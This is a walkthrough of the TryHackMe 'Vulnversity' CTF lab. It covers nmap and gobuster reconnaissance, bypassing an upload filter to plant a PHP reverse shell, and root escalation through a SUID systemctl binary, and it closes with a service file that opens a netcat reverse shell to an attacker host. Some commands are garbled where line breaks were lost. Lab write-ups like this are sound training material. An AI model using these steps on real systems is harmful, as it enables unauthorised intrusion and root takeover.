TryHackMe CTF: Vulnversity — Walkthrough

5 min readMay 25, 2023

This room mainly focused on active recon, web app attacks, and privilege escalation.

[Task 1] Deploy the machine

[Task 2] Reconnaissance

Start a nmap scan on the given box:

nmap -sC -sV -oN nmap/initial <ip>

Initial enumeration

We can see that ports 21, 22, 139, 445, 3128 and 3333 are open.

It is clearly visible that the OS is Ubuntu, on which the WebServer(port 3333) is running.

Scan the box, how many ports are open?

What version of the squid proxy is running on the machine?

3.5.12

What is the most likely operating system this machine is running?

Ubuntu

What port is the web server running on?

We explore the http website running on the webserver.

No functions/buttons were working on the site, and nothing interesting in the view-source.

[Task 3] Locating directories using GoBuster

We run a gobuster scan on the given ip with port as 3333:

gobuster dir -u <ip>:<port> -w <wordlist-path>

Gobuster Scan

We find an /internal directory and further enumeration leads to /internal/uploads directory.

We find an upload form at the /internal directory.

What is the directory that has an upload form page?

/internal/

[Task 4] Compromise the webserver

We try to upload a php reverse shell script but the extension is being filtered.

We start burp suite and enable it in foxy proxy. Create a file with different php extensions for the Sniper attack.

We capture the upload request and then send it to Intruder.

We load our payload as a simple list.

We add the extension of file in our positions tab for the payload.

We start our attack and then we get back the result. Interestingly we see that every extension is yielding Status as 200 but the length of .phtml extension was different from the rest.

We try to upload a shell.phtml(php reverse shell) and we are successful in uploading it.

We start a netcat listener:

nc -lvp 4444

We then go to /internal/uploads and click on our uploaded file. We get a reverse shell on our machine. We stabilize the reverse shell.

Currently we are the www-data user. If we have a look at the /etc/passwd file we find a user named bill. We can directly go to /home/bill directory and find our user.txt flag.

What is the name of the user who manages the webserver?

bill

What is the user flag?

8bd**************************edb

[Task 5] Privelage Escalation

We check the system for SUID files. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

find / -perm -u=s -type f 2>/dev/null

We see that /bin/systemctl is a SUID binary. We could use this to gain privelage access. We have a look at gtfobins and search for systemctl.

Reference: [https://gtfobins.github.io/gtfobins/systemctl/]

We create a temporary service and then use that to view root.txt file.

TF=$(mktemp).serviceecho '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' >$TF/bin/systemctl link $TF
/bin/systemctl enable --now $TF

In the same way we can get a reverse shell with root privileges.

Reference: [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet]

ken=$(mktemp).serviceecho '[Service]
ExecStart=/bin/sh -c "/tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc <ip> <port>"
[Install]
WantedBy=multi-user.target' >$ken/bin/systemctl link $ken
/bin/systemctl enable --now $ken